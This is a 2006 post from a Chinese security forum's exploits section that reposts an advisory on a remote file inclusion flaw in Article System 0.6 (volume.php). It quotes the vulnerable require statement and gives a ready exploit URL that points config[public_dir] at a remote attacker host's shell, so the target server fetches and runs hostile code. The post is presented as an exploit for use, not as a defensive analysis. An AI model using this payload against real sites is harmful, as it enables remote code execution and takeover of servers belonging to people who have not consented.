Article System 0.6 (volume.php) Remote File Include Vulnerability

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1119 小时
注册时间: 2007-10-23
最后登录: 2009-1-4

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2006-11-4 15:15 只看该作者

Article System 0.6 (volume.php) Remote File Include Vulnerability

复制内容到剪贴板

代码:

**********************************************************************************************************

                                          

                 Coding 4 Fun (c4f.pl) 

                                

**********************************************************************************************************



* Article System 0.6 ; 



* Class = Remote File Inclusion ;

 

* Download = [url]http://sourceforge.net/project/showfiles.php?group_id=49971&package_id=43403&release_id=325871[/url] ;



* Found by = GregStar (gregstar[at]c4f[dot]pl) ;



-------------------------------------------------------------------------------------------------------------------





- Vulnerable Code in volume.php:



 require "{$config[&#39;public_dir&#39;]}/templates/html/volume.php" ;





- Exploit:



http://[target]/[path]/volume.php?config[public_dir]=http://evilsite.com/shell?





------------------------------------------------------------------------------------------------------------------





Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,kw@ch and for all friends.







**************************************************************************************************************

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Article System 0.6 (volume.php) Remote File Include Vulnerability